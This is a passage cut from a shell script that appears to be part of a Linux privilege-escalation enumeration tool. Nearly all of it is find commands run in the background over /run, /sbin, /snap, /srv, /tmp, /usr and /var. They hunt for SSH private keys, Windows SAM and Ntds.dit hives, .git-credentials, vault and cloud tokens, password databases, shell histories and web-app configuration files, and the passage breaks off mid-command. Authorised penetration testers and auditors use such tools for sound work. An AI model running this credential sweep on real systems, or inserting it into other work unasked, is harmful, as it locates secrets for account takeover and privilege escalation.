\"wp-config.php\" -o -name \"tomcat-users.xml\" -o -name \"cloud.cfg\" -o -name \"gitlab.rm\" -o -name \".ldaprc\" -o -name \"access.log\" -o -name \"recentservers.xml\" -o -name \".recently-used.xbel\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_RUN=`eval_bckgrd "find /run -name \"*.service\" -o -name \"*.timer\" -o -name \"*.socket\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_SBIN=`eval_bckgrd "find /sbin -name \"NetSetup.log\" -o -name \"RDCMan.settings\" -o -name \"SYSTEM\" -o -name \"datasources.xml\" -o -name \"config.php\" -o -name \"*vnc*.xml\" -o -name \"wsl.exe\" -o -name \"*.service\" -o -name \"sitemanager.xml\" -o -name \"groups.xml\" -o -name \"credentials.db\" -o -name \".pypirc\" -o -name \"https-xampp.conf\" -o -name \"TokenCache.dat\" -o -name \"sites.ini\" -o -name \"*.jks\" -o -name \".env\" -o -name \".github\" -o -name \"*credential*\" -o -name \"*.pfx\" -o -name \"pg_hba.conf\" -o -name \"*.sqlite\" -o -name \"*config*.php\" -o -name \"ntuser.dat\" -o -name \"error.log\" -o -name \"appcmd.exe\" -o -name \"winscp.ini\" -o -name \"pgsql.conf\" -o -name \"accessTokens.json\" -o -name \"scclient.exe\" -o -name \"storage.php\" -o -name \"*vnc*.txt\" -o -name \"krb5.conf\" -o -name \"*.cer\" -o -name \"security.sav\" -o -name \"vault-ssh-helper.hcl\" -o -name \"httpd.conf\" -o -name \"server.xml\" -o -name \"mongod*.conf\" -o -name \"filezilla.xml\" -o -name \"access_tokens.db\" -o -name \"*.pgp\" -o -name \"*vnc*.ini\" -o -name \"AppEvent.Evt\" -o -name \"pagefile.sys\" -o -name \"software\" -o -name \"postgresql.conf\" -o -name \"db.php\" -o -name \"default.sav\" -o -name \"backups\" -o -name \"redis.conf\" -o -name \"*.socket\" -o -name \"azureProfile.json\" -o -name \"printers.xml\" -o -name \"*.crt\" -o -name \"*.timer\" -o -name \"credentials\" -o -name \"anaconda-ks.cfg\" -o -name \"autologin\" -o -name \"fastcgi_params\" -o -name \".google_authenticator\" -o -name \"hostapd.conf\" -o -name \".rhosts\" -o -name \"*.db\" -o -name \"supervisord.conf\" -o -name \"rsyncd.conf\" -o -name \"bash.exe\" -o -name \"system.sav\" -o -name \"unattended.xml\" -o -name \"iis6.log\" -o -name \".profile\" -o -name \"gvm-tools.conf\" -o -name \"backup\" -o -name \"KeePass.enforced*\" -o -name \"*.gpg\" -o -name \"setupinfo\" -o -name \"authorized_keys\" -o -name \"known_hosts\" -o -name \"settings.php\" -o -name \".vault-token\" -o -name \"*vnc*.c*nf*\" -o -name \".erlang.cookie\" -o -name \"Dockerfile\" -o -name \"secrets.yml\" -o -name \"access_tokens.json\" -o -name \"creds*\" -o -name \".lesshst\" -o -name \"krb5.keytab\" -o -name \"web*.config\" -o -name \"docker-compose.yml\" -o -name \"id_dsa*\" -o -name \"ipsec.secrets\" -o -name \"unattend.inf\" -o -name \"kibana.y*ml\" -o -name \"*.keystore\" -o -name \"*.ovpn\" -o -name \"php.ini\" -o -name \"my.cnf\" -o -name \"https.conf\" -o -name \"FreeSSHDservice.ini\" -o -name \"*.rdg\" -o -name \"*.pem\" -o -name \"ftp.config\" -o -name \"software.sav\" -o -name \"passwd\" -o -name \"hosts.equiv\" -o -name \"*.csr\" -o -name \"*.der\" -o -name \"autologin.conf\" -o -name \"unattend.txt\" -o -name \"elasticsearch.y*ml\" -o -name \"*.ftpconfig\" -o -name \"*password*\" -o -name \".*_history.*\" -o -name \"ConsoleHost_history.txt\" -o -name \"*.kdbx\" -o -name \"*.p12\" -o -name \"my.ini\" -o -name \"database.php\" -o -name \".k5login\" -o -name \"sysprep.inf\" -o -name \"kadm5.acl\" -o -name \"AzureRMContext.json\" -o -name \"*.viminfo\" -o -name \"rsyncd.secrets\" -o -name \"wcx_ftp.ini\" -o -name \"authorized_hosts\" -o -name \"debian.cnf\" -o -name \"id_rsa*\" -o -name \"SAM\" -o -name \"protecteduserkey.bin\" -o -name \"sysprep.xml\" -o -name \"ipsec.conf\" -o -name \"*.gnupg\" -o -name \".htpasswd\" -o -name \".plan\" -o -name \".msmtprc\" -o -name \".git\" -o -name \"SecEvent.Evt\" -o -name \"ftp.ini\" -o -name \"*.key\" -o -name \"ws_ftp.ini\" -o -name \"*.keyring\" -o -name \"legacy_credentials.db\" -o -name \"unattend.xml\" -o -name \".gitconfig\" -o -name \".sudo_as_admin_successful\" -o -name \"system\" -o -name \"*.sqlite3\" -o -name \"ddclient.conf\" -o -name \"Ntds.dit\" -o -name \"gitlab.yml\" -o -name \"pgadmin*.db\" -o -name \"*.swp\" -o -name \".bashrc\" -o -name \"docker.sock\" -o -name \"setupinfo.bak\" -o -name \".git-credentials\" -o -name \"KeePass.ini\" -o -name \"index.dat\" -o -name \"docker.socket\" -o -name \"mosquitto.conf\" -o -name \"ffftp.ini\" -o -name \"drives.xml\" -o -name \"snmpd.conf\" -o -name \"cesi.conf\" -o -name \"scheduledtasks.xml\" -o -name \"KeePass.config*\" -o -name \"000-default.conf\" -o -name \"wp-config.php\" -o -name \"tomcat-users.xml\" -o -name \"cloud.cfg\" -o -name \"gitlab.rm\" -o -name \".ldaprc\" -o -name \"access.log\" -o -name \"recentservers.xml\" -o -name \".recently-used.xbel\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_SNAP=`eval_bckgrd "find /snap -name \"NetSetup.log\" -o -name \"RDCMan.settings\" -o -name \"SYSTEM\" -o -name \"datasources.xml\" -o -name \"config.php\" -o -name \"*vnc*.xml\" -o -name \"wsl.exe\" -o -name \"*.service\" -o -name \"sitemanager.xml\" -o -name \"groups.xml\" -o -name \"credentials.db\" -o -name \".pypirc\" -o -name \"https-xampp.conf\" -o -name \"TokenCache.dat\" -o -name \"sites.ini\" -o -name \"*.jks\" -o -name \".env\" -o -name \".github\" -o -name \"*credential*\" -o -name \"*.pfx\" -o -name \"pg_hba.conf\" -o -name \"*.sqlite\" -o -name \"*config*.php\" -o -name \"ntuser.dat\" -o -name \"error.log\" -o -name \"appcmd.exe\" -o -name \"winscp.ini\" -o -name \"pgsql.conf\" -o -name \"accessTokens.json\" -o -name \"scclient.exe\" -o -name \"storage.php\" -o -name \"*vnc*.txt\" -o -name \"krb5.conf\" -o -name \"*.cer\" -o -name \"security.sav\" -o -name \"vault-ssh-helper.hcl\" -o -name \"httpd.conf\" -o -name \"server.xml\" -o -name \"mongod*.conf\" -o -name \"filezilla.xml\" -o -name \"access_tokens.db\" -o -name \"*.pgp\" -o -name \"*vnc*.ini\" -o -name \"AppEvent.Evt\" -o -name \"pagefile.sys\" -o -name \"software\" -o -name \"postgresql.conf\" -o -name \"db.php\" -o -name \"default.sav\" -o -name \"backups\" -o -name \"redis.conf\" -o -name \"*.socket\" -o -name \"azureProfile.json\" -o -name \"printers.xml\" -o -name \"*.crt\" -o -name \"*.timer\" -o -name \"credentials\" -o -name \"anaconda-ks.cfg\" -o -name \"autologin\" -o -name \"fastcgi_params\" -o -name \".google_authenticator\" -o -name \"hostapd.conf\" -o -name \".rhosts\" -o -name \"*.db\" -o -name \"supervisord.conf\" -o -name \"rsyncd.conf\" -o -name \"bash.exe\" -o -name \"system.sav\" -o -name \"unattended.xml\" -o -name \"iis6.log\" -o -name \".profile\" -o -name \"gvm-tools.conf\" -o -name \"backup\" -o -name \"KeePass.enforced*\" -o -name \"*.gpg\" -o -name \"setupinfo\" -o -name \"authorized_keys\" -o -name \"known_hosts\" -o -name \"settings.php\" -o -name \".vault-token\" -o -name \"*vnc*.c*nf*\" -o -name \".erlang.cookie\" -o -name \"Dockerfile\" -o -name \"secrets.yml\" -o -name \"access_tokens.json\" -o -name \"creds*\" -o -name \".lesshst\" -o -name \"krb5.keytab\" -o -name \"web*.config\" -o -name \"docker-compose.yml\" -o -name \"id_dsa*\" -o -name \"ipsec.secrets\" -o -name \"unattend.inf\" -o -name \"kibana.y*ml\" -o -name \"*.keystore\" -o -name \"*.ovpn\" -o -name \"php.ini\" -o -name \"my.cnf\" -o -name \"https.conf\" -o -name \"FreeSSHDservice.ini\" -o -name \"*.rdg\" -o -name \"*.pem\" -o -name \"ftp.config\" -o -name \"software.sav\" -o -name \"passwd\" -o -name \"hosts.equiv\" -o -name \"*.csr\" -o -name \"*.der\" -o -name \"autologin.conf\" -o -name \"unattend.txt\" -o -name \"elasticsearch.y*ml\" -o -name \"*.ftpconfig\" -o -name \"*password*\" -o -name \".*_history.*\" -o -name \"ConsoleHost_history.txt\" -o -name \"*.kdbx\" -o -name \"*.p12\" -o -name \"my.ini\" -o -name \"database.php\" -o -name \".k5login\" -o -name \"sysprep.inf\" -o -name \"kadm5.acl\" -o -name \"AzureRMContext.json\" -o -name \"*.viminfo\" -o -name \"rsyncd.secrets\" -o -name \"wcx_ftp.ini\" -o -name \"authorized_hosts\" -o -name \"debian.cnf\" -o -name \"id_rsa*\" -o -name \"SAM\" -o -name \"protecteduserkey.bin\" -o -name \"sysprep.xml\" -o -name \"ipsec.conf\" -o -name \"*.gnupg\" -o -name \".htpasswd\" -o -name \".plan\" -o -name \".msmtprc\" -o -name \".git\" -o -name \"SecEvent.Evt\" -o -name \"ftp.ini\" -o -name \"*.key\" -o -name \"ws_ftp.ini\" -o -name \"*.keyring\" -o -name \"legacy_credentials.db\" -o -name \"unattend.xml\" -o -name \".gitconfig\" -o -name \".sudo_as_admin_successful\" -o -name \"system\" -o -name \"*.sqlite3\" -o -name \"ddclient.conf\" -o -name \"Ntds.dit\" -o -name \"gitlab.yml\" -o -name \"pgadmin*.db\" -o -name \"*.swp\" -o -name \".bashrc\" -o -name \"docker.sock\" -o -name \"setupinfo.bak\" -o -name \".git-credentials\" -o -name \"KeePass.ini\" -o -name \"index.dat\" -o -name \"docker.socket\" -o -name \"mosquitto.conf\" -o -name \"ffftp.ini\" -o -name \"drives.xml\" -o -name \"snmpd.conf\" -o -name \"cesi.conf\" -o -name \"scheduledtasks.xml\" -o -name \"KeePass.config*\" -o -name \"000-default.conf\" -o -name \"wp-config.php\" -o -name \"tomcat-users.xml\" -o -name \"cloud.cfg\" -o -name \"gitlab.rm\" -o -name \".ldaprc\" -o -name \"access.log\" -o -name \"recentservers.xml\" -o -name \".recently-used.xbel\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_SRV=`eval_bckgrd "find /srv -name \"NetSetup.log\" -o -name \"RDCMan.settings\" -o -name \"SYSTEM\" -o -name \"datasources.xml\" -o -name \"config.php\" -o -name \"*vnc*.xml\" -o -name \"wsl.exe\" -o -name \"*.service\" -o -name \"sitemanager.xml\" -o -name \"groups.xml\" -o -name \"credentials.db\" -o -name \".pypirc\" -o -name \"https-xampp.conf\" -o -name \"TokenCache.dat\" -o -name \"sites.ini\" -o -name \"*.jks\" -o -name \".env\" -o -name \".github\" -o -name \"*credential*\" -o -name \"*.pfx\" -o -name \"pg_hba.conf\" -o -name \"*.sqlite\" -o -name \"*config*.php\" -o -name \"ntuser.dat\" -o -name \"error.log\" -o -name \"appcmd.exe\" -o -name \"winscp.ini\" -o -name \"pgsql.conf\" -o -name \"accessTokens.json\" -o -name \"scclient.exe\" -o -name \"storage.php\" -o -name \"*vnc*.txt\" -o -name \"krb5.conf\" -o -name \"*.cer\" -o -name \"security.sav\" -o -name \"vault-ssh-helper.hcl\" -o -name \"httpd.conf\" -o -name \"server.xml\" -o -name \"mongod*.conf\" -o -name \"filezilla.xml\" -o -name \"access_tokens.db\" -o -name \"*.pgp\" -o -name \"*vnc*.ini\" -o -name \"AppEvent.Evt\" -o -name \"pagefile.sys\" -o -name \"software\" -o -name \"postgresql.conf\" -o -name \"db.php\" -o -name \"default.sav\" -o -name \"backups\" -o -name \"redis.conf\" -o -name \"*.socket\" -o -name \"azureProfile.json\" -o -name \"printers.xml\" -o -name \"*.crt\" -o -name \"*.timer\" -o -name \"credentials\" -o -name \"anaconda-ks.cfg\" -o -name \"autologin\" -o -name \"fastcgi_params\" -o -name \".google_authenticator\" -o -name \"hostapd.conf\" -o -name \".rhosts\" -o -name \"*.db\" -o -name \"supervisord.conf\" -o -name \"rsyncd.conf\" -o -name \"bash.exe\" -o -name \"system.sav\" -o -name \"unattended.xml\" -o -name \"iis6.log\" -o -name \".profile\" -o -name \"gvm-tools.conf\" -o -name \"backup\" -o -name \"KeePass.enforced*\" -o -name \"*.gpg\" -o -name \"setupinfo\" -o -name \"authorized_keys\" -o -name \"known_hosts\" -o -name \"settings.php\" -o -name \".vault-token\" -o -name \"*vnc*.c*nf*\" -o -name \".erlang.cookie\" -o -name \"Dockerfile\" -o -name \"secrets.yml\" -o -name \"access_tokens.json\" -o -name \"creds*\" -o -name \".lesshst\" -o -name \"krb5.keytab\" -o -name \"web*.config\" -o -name \"docker-compose.yml\" -o -name \"id_dsa*\" -o -name \"ipsec.secrets\" -o -name \"unattend.inf\" -o -name \"kibana.y*ml\" -o -name \"*.keystore\" -o -name \"*.ovpn\" -o -name \"php.ini\" -o -name \"my.cnf\" -o -name \"https.conf\" -o -name \"FreeSSHDservice.ini\" -o -name \"*.rdg\" -o -name \"*.pem\" -o -name \"ftp.config\" -o -name \"software.sav\" -o -name \"passwd\" -o -name \"hosts.equiv\" -o -name \"*.csr\" -o -name \"*.der\" -o -name \"autologin.conf\" -o -name \"unattend.txt\" -o -name \"elasticsearch.y*ml\" -o -name \"*.ftpconfig\" -o -name \"*password*\" -o -name \".*_history.*\" -o -name \"ConsoleHost_history.txt\" -o -name \"*.kdbx\" -o -name \"*.p12\" -o -name \"my.ini\" -o -name \"database.php\" -o -name \".k5login\" -o -name \"sysprep.inf\" -o -name \"kadm5.acl\" -o -name \"AzureRMContext.json\" -o -name \"*.viminfo\" -o -name \"rsyncd.secrets\" -o -name \"wcx_ftp.ini\" -o -name \"authorized_hosts\" -o -name \"debian.cnf\" -o -name \"id_rsa*\" -o -name \"SAM\" -o -name \"protecteduserkey.bin\" -o -name \"sysprep.xml\" -o -name \"ipsec.conf\" -o -name \"*.gnupg\" -o -name \".htpasswd\" -o -name \".plan\" -o -name \".msmtprc\" -o -name \".git\" -o -name \"SecEvent.Evt\" -o -name \"ftp.ini\" -o -name \"*.key\" -o -name \"ws_ftp.ini\" -o -name \"*.keyring\" -o -name \"legacy_credentials.db\" -o -name \"unattend.xml\" -o -name \".gitconfig\" -o -name \".sudo_as_admin_successful\" -o -name \"system\" -o -name \"*.sqlite3\" -o -name \"ddclient.conf\" -o -name \"Ntds.dit\" -o -name \"gitlab.yml\" -o -name \"pgadmin*.db\" -o -name \"*.swp\" -o -name \".bashrc\" -o -name \"docker.sock\" -o -name \"setupinfo.bak\" -o -name \".git-credentials\" -o -name \"KeePass.ini\" -o -name \"index.dat\" -o -name \"docker.socket\" -o -name \"mosquitto.conf\" -o -name \"ffftp.ini\" -o -name \"drives.xml\" -o -name \"snmpd.conf\" -o -name \"cesi.conf\" -o -name \"scheduledtasks.xml\" -o -name \"KeePass.config*\" -o -name \"000-default.conf\" -o -name \"wp-config.php\" -o -name \"tomcat-users.xml\" -o -name \"cloud.cfg\" -o -name \"gitlab.rm\" -o -name \".ldaprc\" -o -name \"access.log\" -o -name \"recentservers.xml\" -o -name \".recently-used.xbel\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_SYS=`eval_bckgrd "find /sys -name \"*.service\" -o -name \"*.timer\" -o -name \"*.socket\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_SYSTEM=`eval_bckgrd "find /system -name \"*.service\" -o -name \"*.timer\" -o -name \"*.socket\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_SYSTEMD=`eval_bckgrd "find /systemd -name \"*.service\" -o -name \"*.timer\" -o -name \"*.socket\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_TMP=`eval_bckgrd "find /tmp -name \"NetSetup.log\" -o -name \"RDCMan.settings\" -o -name \"SYSTEM\" -o -name \"datasources.xml\" -o -name \"config.php\" -o -name \"*vnc*.xml\" -o -name \"wsl.exe\" -o -name \"*.service\" -o -name \"sitemanager.xml\" -o -name \"groups.xml\" -o -name \"credentials.db\" -o -name \".pypirc\" -o -name \"https-xampp.conf\" -o -name \"TokenCache.dat\" -o -name \"sites.ini\" -o -name \"*.jks\" -o -name \".env\" -o -name \".github\" -o -name \"*credential*\" -o -name \"*.pfx\" -o -name \"pg_hba.conf\" -o -name \"*.sqlite\" -o -name \"*config*.php\" -o -name \"ntuser.dat\" -o -name \"error.log\" -o -name \"appcmd.exe\" -o -name \"winscp.ini\" -o -name \"agent*\" -o -name \"pgsql.conf\" -o -name \"accessTokens.json\" -o -name \"scclient.exe\" -o -name \"storage.php\" -o -name \"*vnc*.txt\" -o -name \"krb5.conf\" -o -name \"*.cer\" -o -name \"security.sav\" -o -name \"vault-ssh-helper.hcl\" -o -name \"httpd.conf\" -o -name \"server.xml\" -o -name \"mongod*.conf\" -o -name \"filezilla.xml\" -o -name \"access_tokens.db\" -o -name \"*.pgp\" -o -name \"*vnc*.ini\" -o -name \"AppEvent.Evt\" -o -name \"pagefile.sys\" -o -name \"software\" -o -name \"postgresql.conf\" -o -name \"db.php\" -o -name \"default.sav\" -o -name \"backups\" -o -name \"redis.conf\" -o -name \"*.socket\" -o -name \"azureProfile.json\" -o -name \"sess_*\" -o -name \"*.crt\" -o -name \"printers.xml\" -o -name \"*.timer\" -o -name \"credentials\" -o -name \"anaconda-ks.cfg\" -o -name \"autologin\" -o -name \"fastcgi_params\" -o -name \".google_authenticator\" -o -name \"hostapd.conf\" -o -name \".rhosts\" -o -name \"*.db\" -o -name \"supervisord.conf\" -o -name \"rsyncd.conf\" -o -name \"bash.exe\" -o -name \"system.sav\" -o -name \"unattended.xml\" -o -name \"iis6.log\" -o -name \".profile\" -o -name \"gvm-tools.conf\" -o -name \"backup\" -o -name \"KeePass.enforced*\" -o -name \"*.gpg\" -o -name \"setupinfo\" -o -name \"authorized_keys\" -o -name \"known_hosts\" -o -name \"settings.php\" -o -name \".vault-token\" -o -name \".erlang.cookie\" -o -name \"*vnc*.c*nf*\" -o -name \"Dockerfile\" -o -name \"secrets.yml\" -o -name \"access_tokens.json\" -o -name \"creds*\" -o -name \".lesshst\" -o -name \"krb5.keytab\" -o -name \"web*.config\" -o -name \"docker-compose.yml\" -o -name \"id_dsa*\" -o -name \"ipsec.secrets\" -o -name \"unattend.inf\" -o -name \"kibana.y*ml\" -o -name \"*.keystore\" -o -name \"*.ovpn\" -o -name \"php.ini\" -o -name \"my.cnf\" -o -name \"https.conf\" -o -name \"FreeSSHDservice.ini\" -o -name \"*.rdg\" -o -name \"*.pem\" -o -name \"ftp.config\" -o -name \"software.sav\" -o -name \"passwd\" -o -name \"hosts.equiv\" -o -name \"*.csr\" -o -name \"*.der\" -o -name \"autologin.conf\" -o -name \"unattend.txt\" -o -name \"elasticsearch.y*ml\" -o -name \"*.ftpconfig\" -o -name \"*password*\" -o -name \".*_history.*\" -o -name \"ConsoleHost_history.txt\" -o -name \"*.kdbx\" -o -name \"*.p12\" -o -name \"my.ini\" -o -name \"database.php\" -o -name \".k5login\" -o -name \"sysprep.inf\" -o -name \"kadm5.acl\" -o -name \"AzureRMContext.json\" -o -name \"*.viminfo\" -o -name \"rsyncd.secrets\" -o -name \"wcx_ftp.ini\" -o -name \"authorized_hosts\" -o -name \"debian.cnf\" -o -name \"id_rsa*\" -o -name \"SAM\" -o -name \"protecteduserkey.bin\" -o -name \"sysprep.xml\" -o -name \"ipsec.conf\" -o -name \"*.gnupg\" -o -name \".htpasswd\" -o -name \".plan\" -o -name \".msmtprc\" -o -name \".git\" -o -name \"SecEvent.Evt\" -o -name \"ftp.ini\" -o -name \"*.key\" -o -name \"ws_ftp.ini\" -o -name \"*.keyring\" -o -name \"legacy_credentials.db\" -o -name \"unattend.xml\" -o -name \".gitconfig\" -o -name \".sudo_as_admin_successful\" -o -name \"system\" -o -name \"*.sqlite3\" -o -name \"ddclient.conf\" -o -name \"Ntds.dit\" -o -name \"gitlab.yml\" -o -name \"pgadmin*.db\" -o -name \"*.swp\" -o -name \".bashrc\" -o -name \"docker.sock\" -o -name \"setupinfo.bak\" -o -name \".git-credentials\" -o -name \"KeePass.ini\" -o -name \"index.dat\" -o -name \"docker.socket\" -o -name \"mosquitto.conf\" -o -name \"ffftp.ini\" -o -name \"drives.xml\" -o -name \"snmpd.conf\" -o -name \"cesi.conf\" -o -name \"scheduledtasks.xml\" -o -name \"KeePass.config*\" -o -name \"000-default.conf\" -o -name \"wp-config.php\" -o -name \"tomcat-users.xml\" -o -name \"cloud.cfg\" -o -name \"gitlab.rm\" -o -name \".ldaprc\" -o -name \"access.log\" -o -name \"recentservers.xml\" -o -name \".recently-used.xbel\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_USR=`eval_bckgrd "find /usr -name \"NetSetup.log\" -o -name \"RDCMan.settings\" -o -name \"SYSTEM\" -o -name \"datasources.xml\" -o -name \"config.php\" -o -name \"*vnc*.xml\" -o -name \"wsl.exe\" -o -name \"*.service\" -o -name \"sitemanager.xml\" -o -name \"groups.xml\" -o -name \"credentials.db\" -o -name \".pypirc\" -o -name \"https-xampp.conf\" -o -name \"TokenCache.dat\" -o -name \"sites.ini\" -o -name \"*.jks\" -o -name \".env\" -o -name \".github\" -o -name \"*credential*\" -o -name \"*.pfx\" -o -name \"pg_hba.conf\" -o -name \"*.sqlite\" -o -name \"*config*.php\" -o -name \"ntuser.dat\" -o -name \"error.log\" -o -name \"appcmd.exe\" -o -name \"winscp.ini\" -o -name \"pgsql.conf\" -o -name \"accessTokens.json\" -o -name \"scclient.exe\" -o -name \"storage.php\" -o -name \"*vnc*.txt\" -o -name \"krb5.conf\" -o -name \"*.cer\" -o -name \"security.sav\" -o -name \"vault-ssh-helper.hcl\" -o -name \"httpd.conf\" -o -name \"server.xml\" -o -name \"mongod*.conf\" -o -name \"filezilla.xml\" -o -name \"access_tokens.db\" -o -name \"*.pgp\" -o -name \"*vnc*.ini\" -o -name \"AppEvent.Evt\" -o -name \"pagefile.sys\" -o -name \"software\" -o -name \"postgresql.conf\" -o -name \"db.php\" -o -name \"default.sav\" -o -name \"backups\" -o -name \"redis.conf\" -o -name \"*.socket\" -o -name \"azureProfile.json\" -o -name \"printers.xml\" -o -name \"*.crt\" -o -name \"*.timer\" -o -name \"credentials\" -o -name \"anaconda-ks.cfg\" -o -name \"autologin\" -o -name \"fastcgi_params\" -o -name \".google_authenticator\" -o -name \"hostapd.conf\" -o -name \".rhosts\" -o -name \"*.db\" -o -name \"supervisord.conf\" -o -name \"rsyncd.conf\" -o -name \"bash.exe\" -o -name \"system.sav\" -o -name \"unattended.xml\" -o -name \"iis6.log\" -o -name \".profile\" -o -name \"gvm-tools.conf\" -o -name \"backup\" -o -name \"KeePass.enforced*\" -o -name \"*.gpg\" -o -name \"setupinfo\" -o -name \"authorized_keys\" -o -name \"known_hosts\" -o -name \"settings.php\" -o -name \".vault-token\" -o -name \"*vnc*.c*nf*\" -o -name \".erlang.cookie\" -o -name \"Dockerfile\" -o -name \"secrets.yml\" -o -name \"access_tokens.json\" -o -name \"creds*\" -o -name \".lesshst\" -o -name \"krb5.keytab\" -o -name \"web*.config\" -o -name \"docker-compose.yml\" -o -name \"id_dsa*\" -o -name \"ipsec.secrets\" -o -name \"unattend.inf\" -o -name \"kibana.y*ml\" -o -name \"*.keystore\" -o -name \"*.ovpn\" -o -name \"php.ini\" -o -name \"my.cnf\" -o -name \"https.conf\" -o -name \"FreeSSHDservice.ini\" -o -name \"*.rdg\" -o -name \"*.pem\" -o -name \"ftp.config\" -o -name \"software.sav\" -o -name \"passwd\" -o -name \"hosts.equiv\" -o -name \"*.csr\" -o -name \"*.der\" -o -name \"autologin.conf\" -o -name \"unattend.txt\" -o -name \"elasticsearch.y*ml\" -o -name \"*.ftpconfig\" -o -name \"*password*\" -o -name \".*_history.*\" -o -name \"ConsoleHost_history.txt\" -o -name \"*.kdbx\" -o -name \"*.p12\" -o -name \"my.ini\" -o -name \"database.php\" -o -name \"ssh*config\" -o -name \".k5login\" -o -name \"sysprep.inf\" -o -name \"kadm5.acl\" -o -name \"AzureRMContext.json\" -o -name \"*.viminfo\" -o -name \"rsyncd.secrets\" -o -name \"wcx_ftp.ini\" -o -name \"authorized_hosts\" -o -name \"debian.cnf\" -o -name \"id_rsa*\" -o -name \"SAM\" -o -name \"protecteduserkey.bin\" -o -name \"sysprep.xml\" -o -name \"ipsec.conf\" -o -name \"*.gnupg\" -o -name \".htpasswd\" -o -name \".plan\" -o -name \".msmtprc\" -o -name \".git\" -o -name \"SecEvent.Evt\" -o -name \"ftp.ini\" -o -name \"*.key\" -o -name \"ws_ftp.ini\" -o -name \"*.keyring\" -o -name \"legacy_credentials.db\" -o -name \"unattend.xml\" -o -name \".gitconfig\" -o -name \".sudo_as_admin_successful\" -o -name \"system\" -o -name \"*.sqlite3\" -o -name \"ddclient.conf\" -o -name \"Ntds.dit\" -o -name \"gitlab.yml\" -o -name \"pgadmin*.db\" -o -name \"*.swp\" -o -name \".bashrc\" -o -name \"docker.sock\" -o -name \"setupinfo.bak\" -o -name \".git-credentials\" -o -name \"KeePass.ini\" -o -name \"index.dat\" -o -name \"docker.socket\" -o -name \"mosquitto.conf\" -o -name \"ffftp.ini\" -o -name \"drives.xml\" -o -name \"snmpd.conf\" -o -name \"cesi.conf\" -o -name \"scheduledtasks.xml\" -o -name \"KeePass.config*\" -o -name \"000-default.conf\" -o -name \"wp-config.php\" -o -name \"tomcat-users.xml\" -o -name \"cloud.cfg\" -o -name \"gitlab.rm\" -o -name \".ldaprc\" -o -name \"access.log\" -o -name \"recentservers.xml\" -o -name \".recently-used.xbel\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_VAR=`eval_bckgrd "find /var -name \"NetSetup.log\" -o -name \"RDCMan.settings\" -o -name \"SYSTEM\" -o -name \"datasources.xml\" -o -name \"config.php\" -o -name \"*vnc*.xml\" -o -name \"wsl.exe\" -o -name \"*.service\" -o -name \"sitemanager.xml\" -o -name \"groups.xml\" -o -name \"credentials.db\" -o -name \".pypirc\" -o -name \"https-xampp.conf\" -o -name \"TokenCache.dat\" -o -name \"sites.ini\" -o -name \"*.jks\" -o -name \".env\" -o -name \".github\" -o -name \"*credential*\" -o -name \"*.pfx\" -o -name \"pg_hba.conf\" -o -name \"*.sqlite\" -o -name \"*config*.php\" -o -name \"ntuser.dat\" -o -name \"error.log\" -o -name \"appcmd.exe\" -o -name \"winscp.ini\" -o -name \"pgsql.conf\" -o -name \"accessTokens.json\" -o -name \"scclient.exe\" -o -name \"storage.php\" -o -name \"*vnc*.txt\" -o -name \"krb5.conf\" -o -name \"*.cer\" -o -name \"security.sav\" -o -name \"vault-ssh-helper.hcl\" -o -name \"httpd.conf\" -o -name \"server.xml\" -o -name \"mongod*.conf\" -o -name \"filezilla.xml\" -o -name \"access_tokens.db\" -o -name \"*.pgp\" -o -name \"*vnc*.ini\" -o -name \"AppEvent.Evt\" -o -name \"pagefile.sys\" -o -name \"software\" -o -name \"postgresql.conf\" -o -name \"db.php\" -o -name \"default.sav\" -o -name \"backups\" -o -name \"redis.conf\" -o -name \"*.socket\" -o -name \"azureProfile.json\" -o -name \"sess_*\" -o -name \"*.crt\" -o -name \"printers.xml\" -o -name \"*.timer\" -o -name \"credentials\" -o -name \"anaconda-ks.cfg\" -o -name \"autologin\" -o -name \"fastcgi_params\" -o -name \".google_authenticator\" -o -name \"hostapd.conf\" -o -name \".rhosts\" -o -name \"*.db\" -o -name \"supervisord.conf\" -o -name \"rsyncd.conf\" -o -name \"bash.exe\" -o -name \"system.sav\" -o -name \"unattended.xml\" -o -name \"iis6.log\" -o -name \".profile\" -o -name \"gvm-tools.conf\" -o -name \"backup\" -o -name \"KeePass.enforced*\" -o -name \"*.gpg\" -o -name \"setupinfo\" -o -name \"authorized_keys\" -o -name \"known_hosts\" -o -name \"settings.php\" -o -name \".vault-token\" -o -name \"*vnc*.c*nf*\" -o -name \".erlang.cookie\" -o -name \"Dockerfile\" -o -name \"secrets.yml\" -o -name \"access_tokens.json\" -o -name \"creds*\" -o -name \".lesshst\" -o -name \"krb5.keytab\" -o -name \"web*.config\" -o -name \"docker-compose.yml\" -o -name \"id_dsa*\" -o -name \"ipsec.secrets\" -o -name \"unattend.inf\" -o -name \"kibana.y*ml\" -o -name \"*.keystore\" -o -name \"*.ovpn\" -o -name \"php.ini\" -o -name \"my.cnf\" -o -name \"https.conf\" -o -name \"FreeSSHDservice.ini\" -o -name \"*.rdg\" -o -name \"*.pem\" -o -name \"ftp.config\" -o -name \"software.sav\" -o -name \"passwd\" -o -name \"hosts.equiv\" -o -name \"*.csr\" -o -name \"*.der\" -o -name \"autologin.conf\" -o -name \"unattend.txt\" -o -name \"elasticsearch.y*ml\" -o -name \"*.ftpconfig\" -o -name \"*password*\" -o -name \".*_history.*\" -o -name \"ConsoleHost_history.txt\" -o -name \"*.kdbx\" -o -name \"*.p12\" -o -name \"my.ini\" -o -name \"database.php\" -o -name \".k5login\" -o -name \"sysprep.inf\" -o -name \"kadm5.acl\" -o -name \"AzureRMContext.json\" -o -name \"*.viminfo\" -o -name \"rsyncd.secrets\" -o -name \"wcx_ftp.ini\" -o -name \"authorized_hosts\" -o -name \"debian.cnf\" -o -name \"id_rsa*\" -o -name \"SAM\" -o -name \"protecteduserkey.bin\" -o -name 